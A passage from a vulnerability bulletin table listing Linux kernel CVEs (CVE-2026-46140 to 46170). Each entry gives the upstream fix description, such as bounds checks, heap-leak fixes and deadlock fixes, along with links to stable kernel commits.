https://git.kernel.org/stable/c/9bdb2ca31368b7671949dfb94a5d57ffccd01edd https://git.kernel.org/stable/c/5e489c6c47a2ac15edbaca153b9348e42c1eacab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btmtk: validate WMT event SKB length before struct access btmtk_usb_hci_wmt_sync() casts the WMT event response SKB data to struct btmtk_hci_wmt_evt (7 bytes) and struct btmtk_hci_wmt_evt_funcc (9 bytes) without first checking that the SKB contains enough data. A short firmware response causes out-of-bounds reads from SKB tailroom. Use skb_pull_data() to validate and advance past the base WMT event header. For the FUNC_CTRL case, pull the additional status field bytes before accessing them. | 2026-05-28 | not yet calculated | CVE-2026-46140 | https://git.kernel.org/stable/c/c411cf1bfde951cfa821809cf4020ba177f76e0c https://git.kernel.org/stable/c/624fb79dadc1b65757986a9d0fdde5c0cf3fe179 https://git.kernel.org/stable/c/70d37a8b9229e394cc17ddad47e90b81d80fcd09 https://git.kernel.org/stable/c/634a4408c0615c523cf7531790f4f14a422b9206 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/xive: fix kmemleak caused by incorrect chip_data lookup The kmemleak reports the following memory leak: Unreferenced object 0xc0000002a7fbc640 (size 64): comm "kworker/8:1", pid 540, jiffies 4294937872 hex dump (first 32 bytes): 01 00 00 00 00 00 00 00 00 00 09 04 00 04 00 00 ................ 00 00 a7 81 00 00 0a c0 00 00 08 04 00 04 00 00 ................ backtrace (crc 177d48f6): __kmalloc_cache_noprof+0x520/0x730 xive_irq_alloc_data.constprop.0+0x40/0xe0 xive_irq_domain_alloc+0xd0/0x1b0 irq_domain_alloc_irqs_parent+0x44/0x6c pseries_irq_domain_alloc+0x1cc/0x354 irq_domain_alloc_irqs_parent+0x44/0x6c msi_domain_alloc+0xb0/0x220 irq_domain_alloc_irqs_locked+0x138/0x4d0 __irq_domain_alloc_irqs+0x8c/0xfc __msi_domain_alloc_irqs+0x214/0x4d8 msi_domain_alloc_irqs_all_locked+0x70/0xf8 pci_msi_setup_msi_irqs+0x60/0x78 __pci_enable_msix_range+0x54c/0x98c pci_alloc_irq_vectors_affinity+0x16c/0x1d4 nvme_pci_enable+0xac/0x9c0 [nvme] nvme_probe+0x340/0x764 [nvme] This occurs when allocating MSI-X vectors for an NVMe device. During allocation the XIVE code creates a struct xive_irq_data and stores it in irq_data->chip_data. When the MSI-X irqdomain is later freed, xive_irq_free_data() is responsible for retrieving this structure and freeing it. However, after commit cc0cc23babc9 ("powerpc/xive: Untangle xive from child interrupt controller drivers"), xive_irq_free_data() retrieves the chip_data using irq_get_chip_data(), which looks up the data through the child domain. This is incorrect because the XIVE-specific irq data is associated with the XIVE (parent) domain. As a result the lookup fails and the allocated struct xive_irq_data is never freed, leading to the kmemleak report shown above. Fix this by retrieving the irq_data from the correct domain using irq_domain_get_irq_data() and then accessing the chip_data via irq_data_get_irq_chip_data(). | 2026-05-28 | not yet calculated | CVE-2026-46141 | https://git.kernel.org/stable/c/2546fb8c9acc8c7512ed4339ce2a982cb7407065 https://git.kernel.org/stable/c/e66ed135cdf23a318e9727dca48f98f7f6142f78 https://git.kernel.org/stable/c/6771c54728c278bf1e4bfdab4fddbbb186e33498 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: libwx: fix VF illegal register access Register WX_CFG_PORT_ST is a PF restricted register. When a VF is initialized, attempting to read this register triggers an illegal register access, which leads to a system hang. When the device is a VF, the bus function ID can be obtained directly from PCI_FUNC(pdev->devfn). | 2026-05-28 | not yet calculated | CVE-2026-46142 | https://git.kernel.org/stable/c/d3bd8040497968f6f5470018724ef7b0df92f707 https://git.kernel.org/stable/c/f6e656f7cea16b638675a2ab7d7e4cf2516c5eb0 https://git.kernel.org/stable/c/33c5bb50b9c40e8451e6aec4487a31d794b98d92 https://git.kernel.org/stable/c/68a007a701bc06fa426507c551ef12514f2e721d https://git.kernel.org/stable/c/694de316f607fe2473d52ca0707e3918e72c1562 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: q6apm-lpass-dai: Fix multiple graph opens As prepare can be called multiple times, this can result in multiple graph opens for the playback path. This will result in memory leaks; fix this by adding a check before opening. | 2026-05-28 | not yet calculated | CVE-2026-46143 | https://git.kernel.org/stable/c/3141d8b00cad6d3331953c79060ccc3a0262311b https://git.kernel.org/stable/c/c91b7bcc70346d07f57ef03d1b9a338324e213de https://git.kernel.org/stable/c/7cab9f2ad51c858263da836baebad050a1bc7914 https://git.kernel.org/stable/c/b97493f0f42ab9d882a62466782e1900e481a9d6 https://git.kernel.org/stable/c/69acc488aaf39d0ddf6c3cf0e47c1873d39919a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Fix error unwind in mana_ib_create_qp_rss() Sashiko points out that mana_ib_cfg_vport_steering() is leaked, the normal destroy path cleans it up. | 2026-05-28 | not yet calculated | CVE-2026-46144 | https://git.kernel.org/stable/c/190e570cc0fc7f57eacf80d2b854ba54b4dfad6b https://git.kernel.org/stable/c/726af85ea4af750b2f75095e24e3cd99797344cb https://git.kernel.org/stable/c/ab64c63b460bbd0521480bf90d5695783f5e66bc https://git.kernel.org/stable/c/30e8a2f33815d8f51b8f8b829c07af16c671cc27 https://git.kernel.org/stable/c/6aaa978c6b6218cfac15fe1dab17c76fe229ce3f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Avoid potential endless loop in convert_chmap_v3() The convert_chmap_v3() has a loop with its increment size of cs_desc->wLength, but we forgot to validate cs_desc->wLength itself, which may lead to potential endless loop by a malformed descriptor. Add a proper size check to abort the loop for plugging the hole. | 2026-05-28 | not yet calculated | CVE-2026-46146 | https://git.kernel.org/stable/c/e0e3dcf48189603f3865f1a0b799b3b42baae96d https://git.kernel.org/stable/c/4e0ee232ebe3df04874125d7c7f3e6c25ea5483d https://git.kernel.org/stable/c/be09b47ed8677d76962e3240c145502e2ad9f3c8 https://git.kernel.org/stable/c/fa5b19ce69067874b1413f3c2027563bae8c2cb3 https://git.kernel.org/stable/c/6e7247d8f5fefeceb0bb9cc80a5388a636b219cd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Fix pin leak and publication ordering in __pkvm_init_vcpu() Two bugs exist in the vCPU initialisation path: 1. If a check fails after hyp_pin_shared_mem() succeeds, the cleanup path jumps to 'unlock' without calling unpin_host_vcpu() or unpin_host_sve_state(), permanently leaking pin references on the host vCPU and SVE state pages. Extract a register_hyp_vcpu() helper that performs the checks and the store. When register_hyp_vcpu() returns an error, call unpin_host_vcpu() and unpin_host_sve_state() inline before falling through to the existing 'unlock' label. 2. register_hyp_vcpu() publishes the new vCPU pointer into 'hyp_vm->vcpus[]' with a bare store, allowing a concurrent caller of pkvm_load_hyp_vcpu() to observe a partially initialised vCPU object. Ensure the store uses smp_store_release() and the load uses smp_load_acquire(). While 'vm_table_lock' currently serialises the store and the load, these barriers ensure the reader sees the fully initialised 'hyp_vcpu' object even if there were a lockless path or if the lock's own ordering guarantees were insufficient for nested object initialization. | 2026-05-28 | not yet calculated | CVE-2026-46147 | https://git.kernel.org/stable/c/7d3c27b54253cda91dc4d2c1bfc109c490837ab9 https://git.kernel.org/stable/c/6d69c0ed978f7f0efd053fc98390f25ab77c1aea https://git.kernel.org/stable/c/73b9c1e5da84cd69b1a86e374e450817cd051371 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: microchip-core-qspi: control built-in cs manually The coreQSPI IP supports only a single chip select, which is automagically operated by the hardware - set low when the transmit buffer first gets written to and set high when the number of bytes written to the TOTALBYTES field of the FRAMES register have been sent on the bus. Additional devices must use GPIOs for their chip selects. It was reported to me that if there are two devices attached to this QSPI controller, the in-built chip select is set low while linux tries to access the device attached to the GPIO. This went undetected as the boards that connected multiple devices to the SPI controller all exclusively used GPIOs for chip selects, not relying on the built-in chip select at all. It turns out that this was because the built-in chip select, when controlled automagically, is set low when active and high when inactive, thereby ruling out its use for active-high devices or devices that need to transmit with the chip select disabled. Modify the driver so that it controls chip select directly, retaining the behaviour for mem_ops of setting the chip select active for the entire duration of the transfer in the exec_op callback. For regular transfers, implement the set_cs callback for the core to use. As part of this, the existing setup callback, mchp_coreqspi_setup_op(), is removed. Modifying the CLKIDLE field is not safe to do during operation when there are multiple devices, so this code is removed entirely. Setting the MASTER and ENABLE fields is something that can be done once at probe; it doesn't need to be re-run for each device. Instead the new setup callback sets the built-in chip select to its inactive state for active-low devices, as the reset value of the chip select in software controlled mode is low. | 2026-05-28 | not yet calculated | CVE-2026-46148 | https://git.kernel.org/stable/c/998f43196d732f20f9b71eb6ebd973736c9fa911 https://git.kernel.org/stable/c/ee3c99aa102212ad59dc2c19595515c4a6729307 https://git.kernel.org/stable/c/7672749e1496215e8683ce57cf323119033954cf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: usblp: fix heap leak in IEEE 1284 device ID via short response usblp_ctrl_msg() collapses the usb_control_msg() return value to 0/-errno, discarding the actual number of bytes transferred. A broken printer can complete the GET_DEVICE_ID control transfer short and the driver has no way to know. usblp_cache_device_id_string() reads the 2-byte big-endian length prefix from the response and trusts it (clamped only to the buffer bounds). The buffer is kmalloc(1024) at probe time. A device that sends exactly two bytes (e.g. 0x03 0xFF, claiming a 1023-byte ID) leaves device_id_string[2..1022] holding stale kmalloc heap. That stale data is then exposed: - via the ieee1284_id sysfs attribute (sprintf("%s", buf+2), truncated at the first NUL in the stale heap), and - via the IOCNR_GET_DEVICE_ID ioctl, which copy_to_user()s the full claimed length regardless of NULs, up to 1021 bytes of uninitialized heap, with the leak size chosen by the device. Fix this up by just zapping the buffer with zeros before each request sent to the device. | 2026-05-28 | not yet calculated | CVE-2026-46151 | https://git.kernel.org/stable/c/6e29c32a27218f2dcd4a4e9b0b3c5e7728640698 https://git.kernel.org/stable/c/6d8142141c942c0d8e79343cffda9c44bb1f3f4f https://git.kernel.org/stable/c/8247f52d822180e94ccbfdab91613af386a4e34d https://git.kernel.org/stable/c/522d17e93a85575256894212d10e5a1fa6f36529 https://git.kernel.org/stable/c/7a400c6fe3617e31e690e3f7ca37bb335e0498f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 8021q: delete cleared egress QoS mappings vlan_dev_set_egress_priority() currently keeps cleared egress priority mappings in the hash as tombstones. Repeated set/clear cycles with distinct skb priorities therefore accumulate mapping nodes until device teardown and leak memory. Delete mappings when vlan_prio is cleared instead of keeping tombstones. Now that the egress mapping lists are RCU protected, the node can be unlinked safely and freed after a grace period. | 2026-05-28 | not yet calculated | CVE-2026-46153 | https://git.kernel.org/stable/c/a52e122c9e4d56ad9a03b32c915a199276d989c3 https://git.kernel.org/stable/c/7dddc74af369478ba7f9bc136d0fc1dc4570cb66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: Fix potential ADE in loongson_gpu_fixup_dma_hang() The switch case in loongson_gpu_fixup_dma_hang() may not DC2 or DC3, and readl(crtc_reg) will access with random address, because the "device" is from "base+PCI_DEVICE_ID", "base" is from "pdev->devfn+1". This is wrong when my platform inserts a discrete GPU: lspci -tv -[0000:00]-+-00.0 Loongson Technology LLC Hyper Transport Bridge Controller ... +-06.0 Loongson Technology LLC LG100 GPU +-06.2 Loongson Technology LLC Device 7a37 ... Add a default switch case to fix the panic as below: Kernel ade access[#1]: CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.6.136-loong64-desktop-hwe+ #4 pc 90000000017e5534 ra 90000000017e54c0 tp 90000001002f8000 sp 90000001002fb6c0 a0 80000efe00003100 a1 0000000000003100 a2 0000000000000000 a3 0000000000000002 a4 90000001002fb6b4 a5 900000087cdb58fd a6 90000000027af000 a7 0000000000000001 t0 00000000000085b9 t1 000000000000ffff t2 0000000000000000 t3 0000000000000000 t4 fffffffffffffffd t5 00000000fffb6d9c t6 0000000000083b00 t7 00000000000070c0 t8 900000087cdb4d94 u0 900000087cdb58fd s9 90000001002fb826 s0 90000000031c12c8 s1 7fffffffffffff00 s2 90000000031c12d0 s3 0000000000002710 s4 0000000000000000 s5 0000000000000000 s6 9000000100053000 s7 7fffffffffffff00 s8 90000000030d4000 ra: 90000000017e54c0 loongson_gpu_fixup_dma_hang+0x40/0x210 ERA: 90000000017e5534 loongson_gpu_fixup_dma_hang+0xb4/0x210 CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) PRMD: 00000004 (PPLV0 +PIE -PWE) EUEN: 00000000 (-FPE -SXE -ASXE -BTE) ECFG: 00071c1d (LIE=0,2-4,10-12 VS=7) ESTAT: 00480000 [ADEM] (IS= ECode=8 EsubCode=1) BADV: 7fffffffffffff00 PRID: 0014d000 (Loongson-64bit, Loongson-3A6000-HV) Modules linked in: Process swapper/0 (pid: 1, threadinfo=(____ptrval____), task=(____ptrval____)) Stack : 0000000000000006 90000001002fb778 90000001002fb704 0000000000000007 0000000016a65700 90000000017e5690 000000000000ffff ffffffffffffffff 900000000209f7c0 9000000100053000 900000000209f7a8 9000000000eebc08 0000000000000000 0000000000000000 0000000000000006 90000001002fb778 90000001000530b8 90000000027af000 0000000000000000 9000000100054000 9000000100053000 9000000000ebb70c 9000000100004c00 9000000004000001 90000001002fb7e4 bae765461f31cb12 0000000000000000 0000000000000000 0000000000000006 90000000027af000 0000000000000030 90000000027af000 900000087cd6f800 9000000100053000 0000000000000000 9000000000ebc560 7a2500147cdaf720 bae765461f31cb12 0000000000000001 0000000000000030 ... Call Trace: [<90000000017e5534>] loongson_gpu_fixup_dma_hang+0xb4/0x210 [<9000000000eebc08>] pci_fixup_device+0x108/0x280 [<9000000000ebb70c>] pci_setup_device+0x24c/0x690 [<9000000000ebc560>] pci_scan_single_device+0xe0/0x140 [<9000000000ebc684>] pci_scan_slot+0xc4/0x280 [<9000000000ebdd00>] pci_scan_child_bus_extend+0x60/0x3f0 [<9000000000f5bc94>] acpi_pci_root_create+0x2b4/0x420 [<90000000017e5e74>] pci_acpi_scan_root+0x2d4/0x440 [<9000000000f5b02c>] acpi_pci_root_add+0x21c/0x3a0 [<9000000000f4ee54>] acpi_bus_attach+0x1a4/0x3c0 [<90000000010e200c>] device_for_each_child+0x6c/0xe0 [<9000000000f4bbf4>] acpi_dev_for_each_child+0x44/0x70 [<9000000000f4ef40>] acpi_bus_attach+0x290/0x3c0 [<90000000010e200c>] device_for_each_child+0x6c/0xe0 [<9000000000f4bbf4>] acpi_dev_for_each_child+0x44/0x70 [<9000000000f4ef40>] acpi_bus_attach+0x290/0x3c0 [<9000000000f5211c>] acpi_bus_scan+0x6c/0x280 [<900000000189c028>] acpi_scan_init+0x194/0x310 [<900000000189bc6c>] acpi_init+0xcc/0x140 [<9000000000220cdc>] do_one_initcall+0x4c/0x310 [<90000000018618fc>] kernel_init_freeable+0x258/0x2d4 [<900000000184326c>] kernel_init+0x28/0x13c [<9000000000222008>] ret_from_kernel_thread+0xc/0xa4 | 2026-05-28 | not yet calculated | CVE-2026-46156 | https://git.kernel.org/stable/c/07d190e4ec689d6478f7f5e36099fb9bf457e7c5 https://git.kernel.org/stable/c/2cb19b06c09983727573bbe7d7430cbad480a714 https://git.kernel.org/stable/c/9e1aed63a5552958ef2a9bfd699a3f990e52a77f https://git.kernel.org/stable/c/81fef1c278436e6bd68ee4ca05a0acb96e256561 https://git.kernel.org/stable/c/8dfa2f8780e486d05b9a0ffce70b8f5fbd62053e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: ADD_ADDR rtx: always decrease sk refcount When an ADD_ADDR is retransmitted, the sk is held in sk_reset_timer(). It should then be released in all cases at the end. Some (unlikely) checks were returning directly instead of calling sock_put() to decrease the refcount. Jump to a new 'exit' label to call __sock_put() (which will become sock_put() in the next commit) to fix this potential leak. While at it, drop the '!msk' check which cannot happen because it is never reset, and explicitly mark the remaining one as "unlikely". | 2026-05-28 | not yet calculated | CVE-2026-46158 | https://git.kernel.org/stable/c/acd3d3562315c99f3c0db16f0fcc5f0306638982 https://git.kernel.org/stable/c/25e37407442b8766ec2cf52fb4e31b5c3d3aeeae https://git.kernel.org/stable/c/9634cb35af17019baec21ca648516ce376fa10e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix btrfs_ioctl_space_info() slot_count TOCTOU which can lead to info-leak btrfs_ioctl_space_info() has a TOCTOU race between two passes over the block group RAID type lists. The first pass counts entries to determine the allocation size, then the second pass fills the buffer. The groups_sem rwlock is released between passes, allowing concurrent block group removal to reduce the entry count. When the second pass fills fewer entries than the first pass counted, copy_to_user() copies the full alloc_size bytes including trailing uninitialized kmalloc bytes to userspace. Fix by copying only total_spaces entries (the actually-filled count from the second pass) instead of alloc_size bytes, and switch to kzalloc so any future copy size mismatch cannot leak heap data. | 2026-05-28 | not yet calculated | CVE-2026-46159 | https://git.kernel.org/stable/c/f5ee467b56764964027c361641f64953fc0f8f9a https://git.kernel.org/stable/c/4fdc6ee0802121d9cd96b8d085e589f51e5a4ec3 https://git.kernel.org/stable/c/5d12e0ab009ade48c1bff9324fd9bea2c773d088 https://git.kernel.org/stable/c/d09d67d5de577cedae3de9497dff217e0ac8b641 https://git.kernel.org/stable/c/973e57c726c1f8e77259d1c8e519519f1e9aea77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix missing last_unlink_trans update when removing a directory When removing a directory we are not updating its last_unlink_trans field, which can result in incorrect fsync behaviour in case someone fsyncs the directory after it was removed because it's holding a file descriptor on it. Example scenario: mkdir /mnt/dir1 mkdir /mnt/dir1/dir2 mkdir /mnt/dir3 sync -f /mnt # Do some change to the directory and fsync it. chmod 700 /mnt/dir1 xfs_io -c fsync /mnt/dir1 # Move dir2 out of dir1 so that dir1 becomes empty. mv /mnt/dir1/dir2 /mnt/dir3/ open fd on /mnt/dir1 call rmdir(2) on path "/mnt/dir1" fsync fd <trigger power failure> When attempting to mount the filesystem, the log replay will fail with an -EIO error and dmesg/syslog has the following: [445771.626482] BTRFS info (device dm-0): first mount of filesystem 0368bbea-6c5e-44b5-b409-09abe496e650 [445771.626486] BTRFS info (device dm-0): using crc32c checksum algorithm [445771.627912] BTRFS info (device dm-0): start tree-log replay [445771.628335] page: refcount:2 mapcount:0 mapping:0000000061443ddc index:0x1d00 pfn:0x7072a5 [445771.629453] memcg:ffff89f400351b00 [445771.629892] aops:btree_aops [btrfs] ino:1 [445771.630737] flags: 0x17fffc00000402a(uptodate|lru|private|writeback|node=0|zone=2|lastcpupid=0x1ffff) [445771.632359] raw: 017fffc00000402a fffff47284d950c8 fffff472907b7c08 ffff89f458e412b8 [445771.633713] raw: 0000000000001d00 ffff89f6c51d1a90 00000002ffffffff ffff89f400351b00 [445771.635029] page dumped because: eb page dump [445771.635825] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=10 ino=258, invalid nlink: has 2 expect no more than 1 for dir [445771.638088] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14878 owner 5 [445771.638091] BTRFS info (device dm-0): refs 4 lock_owner 0 current 3581087 [445771.638094] item 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160 [445771.638097] inode generation 3 transid 9 size 16 nbytes 16384 [445771.638098] block group 0 mode 40755 links 1 uid 0 gid 0 [445771.638100] rdev 0 sequence 2 flags 0x0 [445771.638102] atime 1775744884.0 [445771.660056] ctime 1775744885.645502983 [445771.660058] mtime 1775744885.645502983 [445771.660060] otime 1775744884.0 [445771.660062] item 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12 [445771.660064] index 0 name_len 2 [445771.660066] item 2 key (256 DIR_ITEM 1843588421) itemoff 16077 itemsize 34 [445771.660068] location key (259 1 0) type 2 [445771.660070] transid 9 data_len 0 name_len 4 [445771.660075] item 3 key (256 DIR_ITEM 2363071922) itemoff 16043 itemsize 34 [445771.660076] location key (257 1 0) type 2 [445771.660077] transid 9 data_len 0 name_len 4 [445771.660078] item 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34 [445771.660079] location key (257 1 0) type 2 [445771.660080] transid 9 data_len 0 name_len 4 [445771.660081] item 5 key (256 DIR_INDEX 3) itemoff 15975 itemsize 34 [445771.660082] location key (259 1 0) type 2 [445771.660083] transid 9 data_len 0 name_len 4 [445771.660084] item 6 key (257 INODE_ITEM 0) itemoff 15815 itemsize 160 [445771.660086] inode generation 9 transid 9 size 8 nbytes 0 [445771.660087] block group 0 mode 40777 links 1 uid 0 gid 0 [445771.660088] rdev 0 sequence 2 flags 0x0 [445771.660089] atime 1775744885.641174097 [445771.660090] ctime 1775744885.645502983 [445771.660091] mtime 1775744885.645502983 [445771.660105] otime 1775744885.641174097 [445771.660106] item 7 key (257 INODE_REF 256) itemoff 15801 itemsize 14 [445771.660107] index 2 name_len 4 [445771.660108] item 8 key (257 DIR_ITEM 2676584006) itemoff 15767 itemsize 34 [445771.660109] location key (2 ---truncated--- | 2026-05-28 | not yet calculated | CVE-2026-46160 | https://git.kernel.org/stable/c/cc3c0a0f965754ce230d93ba44ee5b34fbe6138a https://git.kernel.org/stable/c/aa9c3ecaf7337df3a689318584f879b5339ede0f https://git.kernel.org/stable/c/fb388eb58c1ba047ccabc33901839acfecadcf49 https://git.kernel.org/stable/c/36fcc2c7517f8a86379154c9793f867592aa8b7e https://git.kernel.org/stable/c/999757231c49376cd1a37308d2c8c4c9932571e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix divide-by-zero in setup_geo() with zero far_copies setup_geo() extracts near_copies (nc) and far_copies (fc) from the user-provided layout parameter without checking for zero. When fc=0 with the "improved" far set layout selected, 'geo->far_set_size = disks / fc' triggers a divide-by-zero. Validate nc and fc immediately after extraction, returning -1 if either is zero. | 2026-05-28 | not yet calculated | CVE-2026-46161 | https://git.kernel.org/stable/c/4af2e558e6fdfb972c61350653fd55d1f62b60a5 https://git.kernel.org/stable/c/9d8e03b9a2b1e8ce5c198bf3a409a629f4d02cda https://git.kernel.org/stable/c/913d556e4bd1b56ed822815655b82c7bb54edc51 https://git.kernel.org/stable/c/f9ddb621b2325eb69c95692958daf2bab4dea2c4 https://git.kernel.org/stable/c/9aa6d860b0930e2f72795665c42c44252a558a0c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: fix double free in ice_sf_eth_activate() error path When auxiliary_device_add() fails, ice_sf_eth_activate() jumps to aux_dev_uninit and calls auxiliary_device_uninit(&sf_dev->adev). The device release callback ice_sf_dev_release() frees sf_dev, but the current error path falls through to sf_dev_free and calls kfree(sf_dev) again, causing a double free. Keep kfree(sf_dev) for the auxiliary_device_init() failure path, but avoid falling through to sf_dev_free after auxiliary_device_uninit(). | 2026-05-28 | not yet calculated | CVE-2026-46162 | https://git.kernel.org/stable/c/2ca30340b5028ddc3f17086a538feeff06167b1b https://git.kernel.org/stable/c/121d1f253aed515cd85748f68c664a6cb756e8ad https://git.kernel.org/stable/c/d0c6a4816609f145ffcc74e64baa214c571c17c6 https://git.kernel.org/stable/c/9aab1c3d7299285e2569cbc0ed5892d631a241b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: b43legacy: enforce bounds check on firmware key index in RX path Same fix as b43: the firmware-controlled key index in b43legacy_rx() can exceed dev->max_nr_keys. The existing B43legacy_WARN_ON is non-enforcing in production builds, allowing an out-of-bounds read of dev->key[]. Make the check enforcing by dropping the frame for invalid indices. | 2026-05-28 | not yet calculated | CVE-2026-46163 | https://git.kernel.org/stable/c/1baaeb6adecb9691748c0253dab6ddd19a2b4e9e https://git.kernel.org/stable/c/6ee946077607d7783ae6709a899213fc4fe08f35 https://git.kernel.org/stable/c/9d1bc155802943e92c57a5fb923d23edfbf0b525 https://git.kernel.org/stable/c/fdd4e51979f42ca8b1ab7e6176b607e1caabf2a5 https://git.kernel.org/stable/c/a035766f970bde2d4298346a31a80685be5c0205 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: openvswitch: vport: fix self-deadlock on release of tunnel ports vports are used concurrently and protected by RCU, so netdev_put() must happen after the RCU grace period. So, either in an RCU call or after the synchronize_net(). The rtnl_delete_link() must happen under RTNL and so can't be executed in RCU context. Calling synchronize_net() while holding RTNL is not a good idea for performance and system stability under load in general, so calling netdev_put() in RCU call is the right solution here. However, when the device is deleted, rtnl_unlock() will call netdev_run_todo() and block until all the references are gone. In the current code this means that we never reach the call_rcu() and the vport is never freed and the reference is never released, causing a self-deadlock on device removal. Fix that by moving the rcu_call() before the rtnl_unlock(), so the scheduled RCU callback will be executed when synchronize_net() is called from the rtnl_unlock()->netdev_run_todo() while the RTNL itself is already released. | 2026-05-28 | not yet calculated | CVE-2026-46165 | https://git.kernel.org/stable/c/c741433f6c8dcdecd1d9549d89053761fd1ea413 https://git.kernel.org/stable/c/6522d59fb7de55ce0f0f285d962243ddffebb01f https://git.kernel.org/stable/c/3df75fff46b1517eb479d8e6b8e3500763715dd0 https://git.kernel.org/stable/c/366c482965c673565ecb8bcfb15d5548f13a6a10 https://git.kernel.org/stable/c/aa69918bd418e700309fdd08509dba324fb24296 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: usblp: fix uninitialized heap leak via LPGETSTATUS ioctl Just like in a previous problem in this driver, usblp_ctrl_msg() will collapse the usb_control_msg() return value to 0/-errno, discarding the actual number of bytes transferred. Ideally that short command should be detected and error out, but many printers are known to send "incorrect" responses back so we can't just do that. statusbuf is kmalloc(8) at probe time and never filled before the first LPGETSTATUS ioctl. usblp_read_status() requests 1 byte. If a malicious printer responds with zero bytes, *statusbuf is one byte of stale kmalloc heap, sign-extended into the local int status, which the LPGETSTATUS path then copy_to_user()s directly to the ioctl caller. Fix this all by just zapping out the memory buffer when allocated at probe time. If a later call does a short read, the data will be identical to what the device sent it the last time, so there is no "leak" of information happening. | 2026-05-28 | not yet calculated | CVE-2026-46167 | https://git.kernel.org/stable/c/d06d937b0a4cdb8867f04275c8100a8b943da31a https://git.kernel.org/stable/c/a502b997668401a6821501fc98b7f9220f9b6ff2 https://git.kernel.org/stable/c/762a6ccf391db0d629e590a803a3a2231e17dd3f https://git.kernel.org/stable/c/6b0e7438e31c74b01514d31ff35c1e688c4baaba https://git.kernel.org/stable/c/b38e53cbfb9d84732e5984fbd73e128d592415c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix scheduling with atomic in timestamp sockopt Using lock_sock_fast() (atomic context) around sock_set_timestamp() and sock_set_timestamping() is unsafe, as both helpers can sleep. Replace lock_sock_fast() with sleepable lock_sock()/release_sock() to avoid scheduling while atomic panic. | 2026-05-28 | not yet calculated | CVE-2026-46168 | https://git.kernel.org/stable/c/ebeb70e29e37cfce899309cc2665a3bfe960ed94 https://git.kernel.org/stable/c/b157dab93a7af44a84e78cf0cb311dde475cff5b https://git.kernel.org/stable/c/8a005fe451c73fd2b3d1faa5643c11e6bd07acfc https://git.kernel.org/stable/c/7eb513b42721bee4b96da69f6188d5a7783f210d https://git.kernel.org/stable/c/b5c52908d52c6c8eb8933264aa6087a0600fd892 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix uninit-value by validating catalog record size Syzbot reported a KMSAN uninit-value issue in hfsplus_strcasecmp(). The root cause is that hfs_brec_read() doesn't validate that the on-disk record size matches the expected size for the record type being read. When mounting a corrupted filesystem, hfs_brec_read() may read less data than expected. For example, when reading a catalog thread record, the debug output showed: HFSPLUS_BREC_READ: rec_len=520, fd->entrylength=26 HFSPLUS_BREC_READ: WARNING - entrylength (26) < rec_len (520) - PARTIAL READ! hfs_brec_read() only validates that entrylength is not greater than the buffer size, but doesn't check if it's less than expected. It successfully reads 26 bytes into a 520-byte structure and returns success, leaving 494 bytes uninitialized. This uninitialized data in tmp.thread.nodeName then gets copied by hfsplus_cat_build_key_uni() and used by hfsplus_strcasecmp(), triggering the KMSAN warning when the uninitialized bytes are used as array indices in case_fold(). Fix by introducing hfsplus_brec_read_cat() wrapper that: 1. Calls hfs_brec_read() to read the data 2. Validates the record size based on the type field: - Fixed size for folder and file records - Variable size for thread records (depends on string length) 3. Returns -EIO if size doesn't match expected For thread records, check against HFSPLUS_MIN_THREAD_SZ before reading nodeName.length to avoid reading uninitialized data at call sites that don't zero-initialize the entry structure. Also initialize the tmp variable in hfsplus_find_cat() as defensive programming to ensure no uninitialized data even if validation is bypassed. | 2026-05-28 | not yet calculated | CVE-2026-46169 | https://git.kernel.org/stable/c/61a790974ff7e533acbceca06c7d02f22bf96d4d https://git.kernel.org/stable/c/c91bbd6193c70a02c50c22e0fb1f60c3c5bd053a https://git.kernel.org/stable/c/a420904450962a562ad053a41a53a27755021b48 https://git.kernel.org/stable/c/93e8d613f1a01b6637f387cc93f184cf7fb881d6 https://git.kernel.org/stable/c/b6b592275aeff184aa82fcf6abccd833fb71b393 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: ADD_ADDR rtx: free sk if last When an ADD_ADDR is retransmitted, the sk is held in sk_reset_timer(), and released at the end. If at that moment, it was the last reference being held, the sk would not be freed. sock_put() should then be called instead of __sock_put(). But that's not enough: if it is the last reference, sock_put() will call sk_free(), which will end up calling sk_stop_timer_sync() on the same timer, and waiting indefinitely to finish. So it is needed to mark that the timer is done at the end of the timer handler when it has not been rescheduled, not to call sk_stop_timer_sync() on "itself". | 2026-05-28 | not yet calculated | CVE-2026-46170 | https://git.kernel.org/stable/c/b74ad20198652b6b39a761c277ba65ae82b1e107 https://git.kernel.org/stable/c/8143a224785ceaf2b0856e08d4498916f38228fb https://git.kernel.org/stable/c/b7b9a461569734d33d3259d58d2507adfac107ed |
